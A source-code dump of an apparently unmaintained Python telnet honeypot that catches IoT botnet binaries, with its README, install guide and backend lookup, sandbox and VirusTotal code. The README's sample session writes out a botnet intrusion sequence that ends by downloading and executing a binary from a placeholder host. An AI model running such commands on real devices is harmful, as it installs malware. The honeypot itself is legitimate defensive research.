├── .gitignore ├── Dockerfile ├── INSTALL.md ├── README.md ├── backend.py ├── backend ├── __init__.py ├── additionalinfo.py ├── authcontroller.py ├── backend.py ├── clientcontroller.py ├── cuckoo.py ├── db.py ├── ipdb │ ├── .gitignore │ ├── __init__.py │ └── ipdb.py ├── virustotal.py ├── virustotal_fill_db.py └── webcontroller.py ├── config.dist.yaml ├── create_config.sh ├── create_docker.sh ├── honeypot.py ├── honeypot ├── __init__.py ├── __main__.py ├── client.py ├── sampledb_client.py ├── session.py ├── shell │ ├── __init__.py │ ├── commands │ │ ├── __init__.py │ │ ├── base.py │ │ ├── binary.py │ │ ├── cmd_util.py │ │ ├── shell.py │ │ ├── shellcode.py │ │ ├── tftp.py │ │ └── wget.py │ ├── grammar.peg │ ├── grammar.py │ ├── shell.py │ ├── test.sh │ └── test.txt └── telnet.py ├── html ├── .gitignore ├── admin.html ├── apiurl.js ├── asn.html ├── common.js ├── connection.html ├── connectionlist-embed.html ├── connectionlist.html ├── countries.js ├── fancy │ ├── connhash │ │ └── index.html │ └── graph │ │ └── index.html ├── img.svg ├── img │ ├── .DS_Store │ ├── LICENSE │ ├── flags │ │ ├── .DS_Store │ │ ├── LICENSE │ │ ├── ad.png │ │ ├── ae.png │ │ ├── af.png │ │ ├── ag.png │ │ ├── ai.png │ │ ├── al.png │ │ ├── am.png │ │ ├── an.png │ │ ├── ao.png │ │ ├── ar.png │ │ ├── as.png │ │ ├── at.png │ │ ├── au.png │ │ ├── aw.png │ │ ├── ax.png │ │ ├── az.png │ │ ├── ba.png │ │ ├── bb.png │ │ ├── bd.png │ │ ├── be.png │ │ ├── bf.png │ │ ├── bg.png │ │ ├── bh.png │ │ ├── bi.png │ │ ├── bj.png │ │ ├── bm.png │ │ ├── bn.png │ │ ├── bo.png │ │ ├── br.png │ │ ├── bs.png │ │ ├── bt.png │ │ ├── bv.png │ │ ├── bw.png │ │ ├── by.png │ │ ├── bz.png │ │ ├── ca.png │ │ ├── catalonia.png │ │ ├── cc.png │ │ ├── cd.png │ │ ├── cf.png │ │ ├── cg.png │ │ ├── ch.png │ │ ├── ci.png │ │ ├── ck.png │ │ ├── cl.png │ │ ├── cm.png │ │ ├── cn.png │ │ ├── co.png │ │ ├── cr.png │ │ ├── cs.png │ │ ├── cu.png │ │ ├── cv.png │ │ ├── cx.png │ │ ├── cy.png │ │ ├── cz.png │ │ ├── de.png │ │ ├── dj.png │ │ ├── dk.png │ │ ├── dm.png │ │ ├── do.png │ │ ├── dz.png │ │ ├── ec.png │ │ ├── ee.png │ │ ├── eg.png │ │ ├── eh.png │ │ ├── england.png │ │ ├── er.png │ │ ├── es.png │ │ ├── et.png │ │ ├── eu.png │ │ ├── fam.png │ │ ├── fi.png │ │ ├── fj.png │ │ ├── fk.png │ │ ├── fm.png │ │ ├── fo.png │ │ ├── fr.png │ │ ├── ga.png │ │ ├── gb.png │ │ ├── gd.png │ │ ├── ge.png │ │ ├── gf.png │ │ ├── gh.png │ │ ├── gi.png │ │ ├── gl.png │ │ ├── gm.png │ │ ├── gn.png │ │ ├── gp.png │ │ ├── gq.png │ │ ├── gr.png │ │ ├── gs.png │ │ ├── gt.png │ │ ├── gu.png │ │ ├── gw.png │ │ ├── gy.png │ │ ├── hk.png │ │ ├── hm.png │ │ ├── hn.png │ │ ├── hr.png │ │ ├── ht.png │ │ ├── hu.png │ │ ├── id.png │ │ ├── ie.png │ │ ├── il.png │ │ ├── in.png │ │ ├── io.png │ │ ├── iq.png │ │ ├── ir.png │ │ ├── is.png │ │ ├── it.png │ │ ├── jm.png │ │ ├── jo.png │ │ ├── jp.png │ │ ├── ke.png │ │ ├── kg.png │ │ ├── kh.png │ │ ├── ki.png │ │ ├── km.png │ │ ├── kn.png │ │ ├── kp.png │ │ ├── kr.png │ │ ├── kw.png │ │ ├── ky.png │ │ ├── kz.png │ │ ├── la.png │ │ ├── lb.png │ │ ├── lc.png │ │ ├── li.png │ │ ├── lk.png │ │ ├── lr.png │ │ ├── ls.png │ │ ├── lt.png │ │ ├── lu.png │ │ ├── lv.png │ │ ├── ly.png │ │ ├── ma.png │ │ ├── mc.png │ │ ├── md.png │ │ ├── me.png │ │ ├── mg.png │ │ ├── mh.png │ │ ├── mk.png │ │ ├── ml.png │ │ ├── mm.png │ │ ├── mn.png │ │ ├── mo.png │ │ ├── mp.png │ │ ├── mq.png │ │ ├── mr.png │ │ ├── ms.png │ │ ├── mt.png │ │ ├── mu.png │ │ ├── mv.png │ │ ├── mw.png │ │ ├── mx.png │ │ ├── my.png │ │ ├── mz.png │ │ ├── na.png │ │ ├── nc.png │ │ ├── ne.png │ │ ├── nf.png │ │ ├── ng.png │ │ ├── ni.png │ │ ├── nl.png │ │ ├── no.png │ │ ├── none.png │ │ ├── np.png │ │ ├── nr.png │ │ ├── nu.png │ │ ├── nz.png │ │ ├── om.png │ │ ├── pa.png │ │ ├── pe.png │ │ ├── pf.png │ │ ├── pg.png │ │ ├── ph.png │ │ ├── pk.png │ │ ├── pl.png │ │ ├── pm.png │ │ ├── pn.png │ │ ├── pr.png │ │ ├── ps.png │ │ ├── pt.png │ │ ├── pw.png │ │ ├── py.png │ │ ├── qa.png │ │ ├── re.png │ │ ├── ro.png │ │ ├── rs.png │ │ ├── ru.png │ │ ├── rw.png │ │ ├── sa.png │ │ ├── sb.png │ │ ├── sc.png │ │ ├── scotland.png │ │ ├── sd.png │ │ ├── se.png │ │ ├── sg.png │ │ ├── sh.png │ │ ├── si.png │ │ ├── sj.png │ │ ├── sk.png │ │ ├── sl.png │ │ ├── sm.png │ │ ├── sn.png │ │ ├── so.png │ │ ├── sr.png │ │ ├── st.png │ │ ├── sv.png │ │ ├── sy.png │ │ ├── sz.png │ │ ├── tc.png │ │ ├── td.png │ │ ├── tf.png │ │ ├── tg.png │ │ ├── th.png │ │ ├── tj.png │ │ ├── tk.png │ │ ├── tl.png │ │ ├── tm.png │ │ ├── tn.png │ │ ├── to.png │ │ ├── tr.png │ │ ├── tt.png │ │ ├── tv.png │ │ ├── tw.png │ │ ├── tz.png │ │ ├── ua.png │ │ ├── ug.png │ │ ├── um.png │ │ ├── us.png │ │ ├── uy.png │ │ ├── uz.png │ │ ├── va.png │ │ ├── vc.png │ │ ├── ve.png │ │ ├── vg.png │ │ ├── vi.png │ │ ├── vn.png │ │ ├── vu.png │ │ ├── wales.png │ │ ├── wf.png │ │ ├── ws.png │ │ ├── ye.png │ │ ├── yt.png │ │ ├── za.png │ │ ├── zm.png │ │ └── zw.png │ └── icon.svg ├── index.html ├── js │ └── angular-vis.js ├── network.html ├── networks.html ├── overview.html ├── sample.html ├── sample.js ├── samples.html ├── tag.html ├── tags.html ├── url.html └── urls.html ├── images ├── network.png ├── screen1.png ├── screen2.png └── screen3.png ├── requirements.txt ├── tftpy ├── TftpClient.py ├── TftpContexts.py ├── TftpPacketFactory.py ├── TftpPacketTypes.py ├── TftpServer.py ├── TftpShared.py ├── TftpStates.py └── __init__.py ├── util ├── __init__.py ├── config.py └── dbg.py └── vagrant ├── .gitignore ├── mariadb ├── Vagrantfile └── mysql.sh └── sqlite └── Vagrantfile /.gitignore: -------------------------------------------------------------------------------- 1 | *.pyc 2 | *.db 3 | samples/ 4 | Mirai-Source-Code-master/ 5 | obf.py 6 | import-lost-conns.py 7 | import-length.py 8 | review-sampels.py 9 | *.kate-swp 10 | *.sql 11 | *.log 12 | config.yaml 13 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:2 2 | 3 | WORKDIR /usr/src/app 4 | 5 | COPY ./requirements.txt ./ 6 | RUN pip install --no-cache-dir -r requirements.txt 7 | RUN pip install mysqlclient 8 | 9 | COPY . . 10 | 11 | RUN apt update && apt install -y sqlite3 12 | -------------------------------------------------------------------------------- /INSTALL.md: -------------------------------------------------------------------------------- 1 | # Installation 2 | 3 | For installation instructions, go to section Manual installation. 4 | However, if you just want to get everythig running, there is 5 | also a Vagrantfile. See Section Vagrent for that. 6 | 7 | # Vagrant 8 | 9 | There is a Vagrantfile in the folder vagrant/ you can use to just make 10 | a basic deployment with honeypot + backend + sqlite running. 11 | 12 | Install vagrant and vagrant virtualbox porvider, 13 | then go to vagrant folder and type `vagrant up`. 14 | After a while the box should run a honeypot + backend available 15 | via port-forwarding at `http://localhost:5000/` and `telnet://localhost:2223`. 16 | 17 | # Manual installation 18 | confirmed to work with Ubuntu 16.04.2 LTS 19 | 20 | Install all requirements: 21 | 22 | ``` 23 | apt-get install -y python-pip libmysqlclient-dev python-mysqldb git sqlite3 24 | 25 | git clone https://github.com/Phype/telnet-iot-honeypot.git 26 | cd telnet-iot-honeypot 27 | pip install -r requirements.txt 28 | ``` 29 | 30 | sudo apt-get install python-setuptools python-werkzeug \ 31 | python-flask python-flask-httpauth python-sqlalchemy \ 32 | python-requests python-decorator python-dnspython \ 33 | python-ipaddress python-simpleeval python-yaml 34 | 35 | If you want to use mysql, create a mysql database. Default mysql max key length is 767 bytes, 36 | so it is recommended to use latin1 charset, else the db setup will fail. 37 | 38 | ``` 39 | apt-get install mysql-server mysql-client 40 | sudo mysql_secure_installation 41 | 42 | mysql 43 | CREATE DATABASE telhoney CHARACTER SET latin1 COLLATE latin1_swedish_ci; 44 | grant all privileges on telhoney.* to telhoney@localhost identified by "YOUR_PASSWORD"; 45 | flush privileges; 46 | ``` 47 | 48 | ## Configuration 49 | 50 | This software consists of 2 components, a honeypot (client) and a backend (server). 51 | The honeypot will accept incoming telnet connections and may download samples 52 | which an adversary may try to download in the telnet session. When a session is 53 | closed, the honeypot will post all data about the connection to the backend using 54 | a REST-API. 55 | 56 | The configuration for both honeypot and backend is in the files 57 | `config.dist.yaml` and `config.yaml`. The `config.dist.yaml` contains the default 58 | config. If you want to change anything, change or create overriding entries in 59 | `config.yaml`. If you need documentation about the configuration, 60 | the file `config.dist.yaml` contains some comments. 61 | 62 | The REST-API requires authentification (HTTP Basic Auth). 63 | When the backend is started for the first time, 64 | it will create a "users" table in the database containing an "admin" user. 65 | The admin users password is read from the configuration file. 66 | If this file is empty, it will be created with random credentials. 67 | 68 | *TL;DR*: The default config should just work, if you need the credentials for the 69 | admin user, see the file `config.yaml`. 70 | 71 | ## Running 72 | 73 | Create a config: 74 | 75 | bash create_config.sh 76 | 77 | Start the backend: 78 | 79 | python backend.py 80 | 81 | Now, start the honeypot: 82 | 83 | python honeypot.py 84 | 85 | Now, you can test the honeypot 86 | 87 | telnet 127.0.0.1 2223 88 | 89 | ## HTML Frontend 90 | 91 | You can use the frontend by just opening the file html/index.html in your browser. 92 | If you want to make the frontend publically available, deploy the html/ folder to you webserver, 93 | or install one: 94 | 95 | ``` 96 | sudo apt-get install apache2 97 | cd telnet-iot-honeypot 98 | cp -R html /var/www 99 | sudo chown www-data:www-data /var/www -R 100 | ``` 101 | 102 | ## Virustotal integration 103 | 104 | Please get yout own virustotal key, 105 | since mine only allows for 4 API Req/min. 106 | 107 | For how to do this, see https://www.virustotal.com/de/faq/#virustotal-api 108 | 109 | When you got one, put it in your config.yamland enable virustotal integration: 110 | 111 | vt_key: "GET_YOUR_OWN" 112 | submit_to_vt: true 113 | 114 | If you want to import virustotal reports of the collected samples, 115 | run (may have to restart because of db locks). *TODO*: test if this still works 116 | 117 | python virustotal_fill_db.php 118 | 119 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## Disclaimer 2 | 3 | This project neither supported or in development anymore. It is based on python2 which has reached its EOL in 2020 and uses dependencies which are getting harder to install over time. Use at your own risk! 4 | 5 | # Telnet IoT honeypot 6 | 7 | 'Python telnet honeypot for catching botnet binaries' 8 | 9 | This project implements a python telnet server trying to act 10 | as a honeypot for IoT Malware which spreads over horribly 11 | insecure default passwords on telnet servers on the internet. 12 | 13 | The honeypot works by emulating a shell enviroment, just like 14 | cowrie (https://github.com/micheloosterhof/cowrie). 15 | The aim of this project is primarily to automatically analyse 16 | Botnet connections and "map" Botnets by linking diffrent 17 | connections and even Networks together. 18 | 19 | ## Architecture 20 | 21 | The application has a client/server architecture, 22 | with a client (the actual honeypot) accepting telnet connections 23 | and a server which receives information about connections and 24 | does the analysis. 25 | 26 | The backend server exposes a HTTP interface which is used 27 | to access to frontend as well as by the clients to push new 28 | Connection information to the backend. 29 | 30 | ## Automatic analysis 31 | 32 | The Backend uses 2 diffrent mechanisms to automatically link 33 | connections: 34 | 35 | ### Networks 36 | 37 | Networks are discovered Botnets. A network is the set of all linked 38 | connections, urls and samples. Urls and samples 39 | are linked when they are used in a connection. Two connections are linked 40 | when both connections are recieved by the same honeypot client 41 | (mutliple clients are supported!) and use the same credentials in a short 42 | period of time (defautl 2 minutes) or come from the same IP address. 43 | 44 | ### Malware 45 | 46 | Multiple networks are identified to use the same type of malware 47 | if the text entered during sessions of the networks aro mostly the 48 | same. This comparison is done using sort of "hash"-function which 49 | basically translates a session (or connection) into a sequence 50 | of words and then maps each word to a single byte so this resulting 51 | sequence of bytes can be easily searched. 52 | 53 | # Running 54 | 55 | The application has a config file named config.py. 56 | Samples are included for local and client/server deployments. 57 | 58 | ## Configuration 59 | 60 | The backend requires a SQL-database (default sqlite) which is initialized 61 | at first run. Before the first run you should generate a admin account 62 | which is used to generate more users. The admin account can also directly 63 | used by a client to post connections. When more than one honeypots shall be 64 | connected, creating multiple users is recommended. 65 | 66 | bash create_config.sh 67 | 68 | Both client and backend will read the files `config.yaml` and `config.dist.yaml` 69 | to read configuration parameters. The `config.dist.yaml` file includes 70 | default values for all but admin user credentials and these parameters 71 | are overwirtten by entries in the `config.yaml` file. 72 | 73 | ## Running the Server 74 | 75 | python backend.py 76 | 77 | ## Running the Client 78 | 79 | This project contains an own honeypot, however because of the client-server architecture, 80 | other honeypot can be used as well. 81 | 82 | ### Using the built-in honeypot 83 | 84 | python honeypot.py 85 | 86 | The client cannot be started without the server running. To use a diffrent configuration 87 | for the client you can use the `-c` switch like this: 88 | 89 | python honeypot.py -c myconfig.yaml 90 | 91 | If you only want to check the honeypot functionality, 92 | you can start the client in interactive mode: 93 | 94 | python honeypot shell 95 | 96 | ### Using cowrie 97 | 98 | I wrote an output plugin for cowrie, which has much more features than the built in honeypot. 99 | If you want to use cowrie instead, checkout my fork which includes the output module here: 100 | https://github.com/Phype/cowrie . 101 | 102 | ## Opening the frontend 103 | 104 | After the server is started, open `http://127.0.0.1/` in your favorite browser. 105 | 106 | ## Sample Connection 107 | 108 | enable 109 | shell 110 | sh 111 | cat /proc/mounts; /bin/busybox PEGOK 112 | cd /tmp; (cat .s || cp /bin/echo .s); /bin/busybox PEGOK 113 | nc; wget; /bin/busybox PEGOK 114 | (dd bs=52 count=1 if=.s || cat .s) 115 | /bin/busybox PEGOK 116 | rm .s; wget http://example.com:4636/.i; chmod +x .i; ./.i; exit 117 | 118 | ## Images 119 | 120 | ![Screenshot 1](images/screen1.png) 121 | 122 | ![Screenshot 2](images/screen2.png) 123 | 124 | ![Screenshot 3](images/screen3.png) 125 | -------------------------------------------------------------------------------- /backend.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import json 3 | import traceback 4 | 5 | from util.config import config 6 | 7 | if len(sys.argv) > 1 and sys.argv[1] == "cleardb": 8 | print "This will DELETE ALL DATA except users and cached asn data" 9 | print "from the database currently used at:" 10 | print "" 11 | print " " + config.get("sql") 12 | print "" 13 | print "If you really want to DELETE ALL DATA, type 'delete' and press enter." 14 | print "" 15 | doit = sys.stdin.readline() 16 | print "" 17 | if doit.strip() != "delete": 18 | print "ABORTED" 19 | sys.exit(0) 20 | 21 | from backend.db import delete_everything 22 | delete_everything() 23 | sys.exit(0) 24 | 25 | # Import from backend is faster: 26 | # Benchmark: 27 | # CPU: Intel(R) Core(TM) i5-6500 CPU @ 3.20GHz 28 | # Storage: Samsung SSD PM961 29 | # File size: 7,3M 30 | # SQLite: 31 | # honeypot: 0m26,056s 32 | # backend: 0m21,445s 33 | # Mariadb: 34 | # honeypot: 0m32,684s 35 | # backend: 0m14,849s 36 | 37 | if len(sys.argv) > 2 and sys.argv[1] == "import": 38 | from backend.clientcontroller import ClientController 39 | 40 | fname = sys.argv[2] 41 | if len(sys.argv) > 3: 42 | username = sys.argv[3] 43 | else: 44 | username = config.get("backend_user") 45 | 46 | print "Importing " + fname + " as user " + username 47 | 48 | with open(fname, "rb") as fp: 49 | ctrl = ClientController() 50 | for line in fp: 51 | line = line.strip() 52 | obj = json.loads(line) 53 | 54 | if obj["ip"] != None and obj["date"] >= 1515899912: 55 | print "conn " + obj["ip"] + " date " + str(obj["date"]) 56 | obj["backend_username"] = username 57 | try: 58 | ctrl.put_session(obj) 59 | except: 60 | print "Cannot Put Session" 61 | print "----------------------------" 62 | traceback.print_exc() 63 | print "----------------------------" 64 | print repr(obj) 65 | sys.exit(0) 66 | sys.exit(0) 67 | 68 | if len(sys.argv) > 1: 69 | print "Unknown action '" + sys.argv[1] + "'" 70 | print "Available commands:" 71 | print " import file.json : imports raw og file" 72 | print " cleardb : deletes all data from db" 73 | print "To simply start the backend, use no command at all" 74 | sys.exit(0) 75 | 76 | from backend.backend import run 77 | run() 78 | 79 | -------------------------------------------------------------------------------- /backend/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Phype/telnet-iot-honeypot/5d32829a36b5bcd369e47d9225f7a88dfdcfe490/backend/__init__.py -------------------------------------------------------------------------------- /backend/additionalinfo.py: -------------------------------------------------------------------------------- 1 | import dns.resolver 2 | import ipaddress 3 | import urlparse 4 | import re 5 | import traceback 6 | 7 | import ipdb.ipdb 8 | 9 | def filter_ascii(string): 10 | string = ''.join(char for char in string if ord(char) < 128 and ord(char) > 32 or char in "\r\n ") 11 | return string 12 | 13 | def query_txt(cname): 14 | try: 15 | answer = dns.resolver.query(filter_ascii(cname), "TXT") 16 | 17 | for rr in answer.rrset: 18 | if rr.strings: return rr.strings[0] 19 | except Exception as e: 20 | traceback.print_exc() 21 | pass 22 | 23 | return None 24 | 25 | def query_a(cname): 26 | try: 27 | answer = dns.resolver.query(filter_ascii(cname), "A") 28 | 29 | for data in answer: 30 | if data.address: return data.address 31 | except: 32 | traceback.print_exc() 33 | pass 34 | 35 | return None 36 | 37 | def txt_to_ipinfo(txt): 38 | parts = txt.split("|") 39 | 40 | return { 41 | "asn": filter_ascii(parts[0].strip()), 42 | "ipblock": filter_ascii(parts[1].strip()), 43 | "country": filter_ascii(parts[2].strip()), 44 | "reg": filter_ascii(parts[3].strip()), 45 | "updated": filter_ascii(parts[4].strip()) 46 | } 47 | 48 | def txt_to_asinfo(txt): 49 | parts = txt.split("|") 50 | 51 | return { 52 | "asn": filter_ascii(parts[0].strip()), 53 | "country": filter_ascii(parts[1].strip()), 54 | "reg": filter_ascii(parts[2].strip()), 55 | "updated": filter_ascii(parts[3].strip()), 56 | "name": filter_ascii(parts[4].strip()) 57 | } 58 | 59 | def get_ip4_info(ip): 60 | oktets = ip.split(".") 61 | reverse = oktets[3] + "." + oktets[2] + "." + oktets[1] + "." + oktets[0] 62 | 63 | answer = query_txt(reverse + ".origin.asn.cymru.com") 64 | 65 | if answer: 66 | return txt_to_ipinfo(answer) 67 | 68 | return None 69 | 70 | def get_ip6_info(ip): 71 | ip = ipaddress.ip_address(unicode(ip)) 72 | ip = list(ip.exploded.replace(":", "")) 73 | 74 | ip.reverse() 75 | 76 | reverse = ".".join(ip) 77 | 78 | answer = query_txt(reverse + ".origin6.asn.cymru.com") 79 | if answer: 80 | return txt_to_ipinfo(answer) 81 | 82 | return None 83 | 84 | def get_ip_info(ip): 85 | is_v4 = "." in ip 86 | is_v6 = ":" in ip 87 | 88 | if is_v4: 89 | return get_ip4_info(ip) 90 | elif is_v6: 91 | return get_ip6_info(ip) 92 | else: 93 | print("Cannot parse ip " + ip) 94 | return None 95 | 96 | def get_asn_info(asn): 97 | answer = query_txt("AS" + str(asn) + ".asn.cymru.com") 98 | if answer: 99 | return txt_to_asinfo(answer) 100 | 101 | return None 102 | 103 | def get_url_info(url): 104 | try: 105 | parsed = urlparse.urlparse(url) 106 | netloc = parsed.netloc 107 | ip = None 108 | 109 | # IPv6 110 | if "[" in netloc: 111 | netloc = re.match("\\[(.*)\\]", netloc).group(1) 112 | ip = netloc 113 | 114 | # IPv4 / domain name 115 | else: 116 | if ":" in netloc: 117 | netloc = re.match("(.*?):", netloc).group(1) 118 | 119 | if re.match("[a-zA-Z]", netloc): 120 | ip = query_a(netloc) 121 | else: 122 | ip = netloc 123 | 124 | return ip, get_ip_info(ip) 125 | 126 | except: 127 | traceback.print_exc() 128 | pass 129 | 130 | return None 131 | 132 | if __name__ == "__main__": 133 | print get_ip_info("79.220.249.125") 134 | print get_ip_info("2a00:1450:4001:81a::200e") 135 | print get_asn_info(3320) 136 | 137 | print get_url_info("http://google.com") 138 | print get_url_info("http://183.144.16.51:14722/.i") 139 | print get_url_info("http://[::1]:14722/.i") 140 | -------------------------------------------------------------------------------- /backend/authcontroller.py: -------------------------------------------------------------------------------- 1 | import os 2 | import hashlib 3 | import traceback 4 | import struct 5 | import json 6 | import time 7 | 8 | import additionalinfo 9 | import ipdb.ipdb 10 | 11 | from sqlalchemy import desc, func, and_, or_ 12 | from decorator import decorator 13 | from functools import wraps 14 | from simpleeval import simple_eval 15 | from argon2 import argon2_hash 16 | 17 | from db import get_db, filter_ascii, Sample, Connection, Url, ASN, Tag, User, Network, Malware, IPRange, db_wrapper 18 | from virustotal import Virustotal 19 | 20 | from cuckoo import Cuckoo 21 | 22 | from util.dbg import dbg 23 | from util.config import config 24 | 25 | from difflib import ndiff 26 | 27 | class AuthController: 28 | 29 | def __init__(self): 30 | self.session = None 31 | self.salt = config.get("backend_salt") 32 | self.checkInitializeDB() 33 | 34 | def pwhash(self, username, password): 35 | return argon2_hash(str(password), self.salt + str(username), buflen=32).encode("hex") 36 | 37 | @db_wrapper 38 | def checkInitializeDB(self): 39 | user = self.session.query(User).filter(User.id == 1).first() 40 | if user == None: 41 | admin_name = config.get("backend_user") 42 | admin_pass = config.get("backend_pass") 43 | 44 | print 'Creating admin user "' + admin_name + '" see config for password' 45 | self.addUser(admin_name, admin_pass, 1) 46 | 47 | @db_wrapper 48 | def getUser(self, username): 49 | user = self.session.query(User).filter(User.username == username).first() 50 | return user.json(depth=1) if user else None 51 | 52 | @db_wrapper 53 | def addUser(self, username, password, id=None): 54 | user = User(username=username, password=self.pwhash(username, password)) 55 | if id != None: 56 | user.id = id 57 | self.session.add(user) 58 | return user.json() 59 | 60 | @db_wrapper 61 | def checkAdmin(self, user): 62 | user = self.session.query(User).filter(User.username == user).first() 63 | if user == None: 64 | return False 65 | return user.id == 1 66 | 67 | @db_wrapper 68 | def checkLogin(self, username, password): 69 | user = self.session.query(User).filter(User.username == username).first() 70 | if user == None: 71 | return False 72 | if self.pwhash(username, password) == user.password: 73 | return True 74 | else: 75 | return False 76 | -------------------------------------------------------------------------------- /backend/cuckoo.py: -------------------------------------------------------------------------------- 1 | import json 2 | import os 3 | try: 4 | from urllib.parse import urlparse, urljoin 5 | except ImportError: 6 | from urlparse import urlparse, urljoin 7 | 8 | import requests 9 | from requests.auth import HTTPBasicAuth 10 | from util.config import config 11 | 12 | try: 13 | import urllib3 14 | urllib3.disable_warnings() 15 | except (AttributeError, ImportError): 16 | pass 17 | 18 | class Cuckoo(): 19 | 20 | def __init__(self, config): 21 | self.url_base = config.get("cuckoo_url_base") 22 | self.api_user = config.get("cuckoo_user") 23 | self.api_passwd = config.get("cuckoo_passwd") 24 | self.cuckoo_force = config.get("cuckoo_force") 25 | 26 | def upload(self, path, name): 27 | 28 | if self.cuckoo_force or self.cuckoo_check_if_dup(os.path.basename(path)) is False: 29 | print("Sending file to Cuckoo") 30 | self.postfile(path, name) 31 | 32 | def cuckoo_check_if_dup(self, sha256): 33 | """ 34 | Check if file already was analyzed by cuckoo 35 | """ 36 | try: 37 | print("Looking for tasks for: {}".format(sha256)) 38 | res = requests.get(urljoin(self.url_base, "/files/view/sha256/{}".format(sha256)), 39 | verify=False, 40 | auth=HTTPBasicAuth(self.api_user,self.api_passwd), 41 | timeout=60) 42 | if res and res.ok and res.status_code == 200: 43 | print("Sample found in Sandbox, with ID: {}".format(res.json().get("sample", {}).get("id", 0))) 44 | return True 45 | else: 46 | return False 47 | except Exception as e: 48 | print(e) 49 | 50 | return False 51 | 52 | def postfile(self, artifact, fileName): 53 | """ 54 | Send a file to Cuckoo 55 | """ 56 | files = {"file": (fileName, open(artifact, "rb").read())} 57 | try: 58 | res = requests.post(urljoin(self.url_base, "tasks/create/file").encode("utf-8"), files=files, auth=HTTPBasicAuth( 59 | self.api_user, 60 | self.api_passwd 61 | ), 62 | verify=False) 63 | if res and res.ok: 64 | print("Cuckoo Request: {}, Task created with ID: {}".format(res.status_code, res.json()["task_id"])) 65 | else: 66 | print("Cuckoo Request failed: {}".format(res.status_code)) 67 | except Exception as e: 68 | print("Cuckoo Request failed: {}".format(e)) 69 | return 70 | 71 | 72 | def posturl(self, scanUrl): 73 | """ 74 | Send a URL to Cuckoo 75 | """ 76 | data = {"url": scanUrl} 77 | try: 78 | res = requests.post(urljoin(self.url_base, "tasks/create/url").encode("utf-8"), data=data, auth=HTTPBasicAuth( 79 | self.api_user, 80 | self.api_passwd 81 | ), 82 | verify=False) 83 | if res and res.ok: 84 | print("Cuckoo Request: {}, Task created with ID: {}".format(res.status_code, res.json()["task_id"])) 85 | else: 86 | print("Cuckoo Request failed: {}".format(res.status_code)) 87 | except Exception as e: 88 | print("Cuckoo Request failed: {}".format(e)) 89 | return 90 | -------------------------------------------------------------------------------- /backend/ipdb/.gitignore: -------------------------------------------------------------------------------- 1 | *.CSV 2 | *.csv 3 | -------------------------------------------------------------------------------- /backend/ipdb/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Phype/telnet-iot-honeypot/5d32829a36b5bcd369e47d9225f7a88dfdcfe490/backend/ipdb/__init__.py -------------------------------------------------------------------------------- /backend/ipdb/ipdb.py: -------------------------------------------------------------------------------- 1 | 2 | import csv 3 | import ipaddress 4 | import struct 5 | import os 6 | 7 | def ipstr2int(ip): 8 | ip = unicode(ip) 9 | ip = ipaddress.IPv4Address(ip).packed 10 | ip = struct.unpack("!I", ip)[0] 11 | return ip 12 | 13 | class Entry: 14 | def __init__(self, start, end, value): 15 | self.start = int(start) 16 | self.end = int(end) 17 | self.value = value 18 | 19 | class IPTable: 20 | def __init__(self, fname): 21 | self.tzlist = [] 22 | iplocfile = os.path.join(os.path.dirname(__file__), fname) 23 | with open(iplocfile, "rb") as ipcsv: 24 | reader = csv.reader(ipcsv, delimiter=',', quotechar='"') 25 | for row in reader: 26 | e = Entry(row[0], row[1], row) 27 | self.tzlist.append(e) 28 | 29 | def find_i(self, ip, start, end): 30 | if end - start < 100: 31 | for i in range(start, end): 32 | obj = self.tzlist[i] 33 | if obj.start <= ip and ip <= obj.end: 34 | return obj.value 35 | return None 36 | else: 37 | mid = start + (end - start) / 2 38 | val = self.tzlist[mid].start 39 | if ip < val: return self.find_i(ip, start, mid) 40 | elif ip > val: return self.find_i(ip, mid, end) 41 | else: return self.tzlist[mid].value 42 | 43 | def __iter__(self): 44 | return self.tzlist.__iter__() 45 | 46 | def find_int(self, ip): 47 | return self.find_i(ip, 0, len(self.tzlist) - 1) 48 | 49 | def find(self, ip): 50 | return self.find_i(ipstr2int(ip), 0, len(self.tzlist) - 1) 51 | 52 | def get_geo(): 53 | return IPTable("IP2LOCATION-LITE-DB11.CSV") 54 | 55 | def get_asn(): 56 | return IPTable("IP2LOCATION-LITE-ASN.CSV") 57 | 58 | def get_geo_iter(): 59 | iplocfile = os.path.join(os.path.dirname(__file__), "IP2LOCATION-LITE-DB11.CSV") 60 | fp = open(iplocfile, "rb") 61 | return csv.reader(fp, delimiter=',', quotechar='"') 62 | 63 | class IPDB: 64 | def __init__(self): 65 | self.geo = get_geo() 66 | self.asn = get_asn() 67 | 68 | def find(self, ip): 69 | geo = self.geo.find(ip) 70 | asn = self.asn.find(ip) 71 | 72 | if geo != None and asn != None: 73 | r = {} 74 | r["asn"] = int(asn[3]) 75 | r["ipblock"] = asn[2] 76 | r["country"] = geo[2] 77 | r["region"] = geo[4] 78 | r["city"] = geo[5] 79 | r["zip"] = geo[8] 80 | r["lon"] = float(geo[7]) 81 | r["lat"] = float(geo[6]) 82 | r["timezone"] = geo[9] 83 | return r 84 | else: 85 | return None 86 | 87 | if __name__ == "__main__": 88 | db = IPDB() 89 | print db.find("217.81.94.77") 90 | 91 | 92 | -------------------------------------------------------------------------------- /backend/virustotal.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import time 3 | import db 4 | import Queue 5 | 6 | from util.config import config 7 | 8 | 9 | class QuotaExceededError(Exception): 10 | def __str__(self): 11 | return "QuotaExceededError: Virustotal API Quota Exceeded" 12 | 13 | class Virustotal: 14 | def __init__(self, key): 15 | self.api_key = key 16 | self.url = "https://www.virustotal.com/vtapi/v2/" 17 | self.user_agent = "Telnet Honeybot Backend" 18 | self.engines = ["DrWeb", "Kaspersky", "ESET-NOD32"] 19 | 20 | self.queue = Queue.Queue() 21 | self.timeout = 0 22 | 23 | def req(self, method, url, files=None, params=None, headers=None): 24 | print "VT " + url 25 | r = None 26 | if method == "GET": 27 | r = requests.get(url, files=files, params=params, headers=headers) 28 | elif method == "POST": 29 | r = requests.post(url, files=files, params=params, headers=headers) 30 | else: 31 | raise ValueError("Unknown Method: " + str(method)) 32 | 33 | if r.status_code == 204: 34 | raise QuotaExceededError() 35 | else: 36 | return r 37 | 38 | def upload_file(self, f, fname): 39 | fp = open(f, 'rb') 40 | params = {'apikey': self.api_key} 41 | files = {'file': (fname, fp)} 42 | headers = { "User-Agent" : 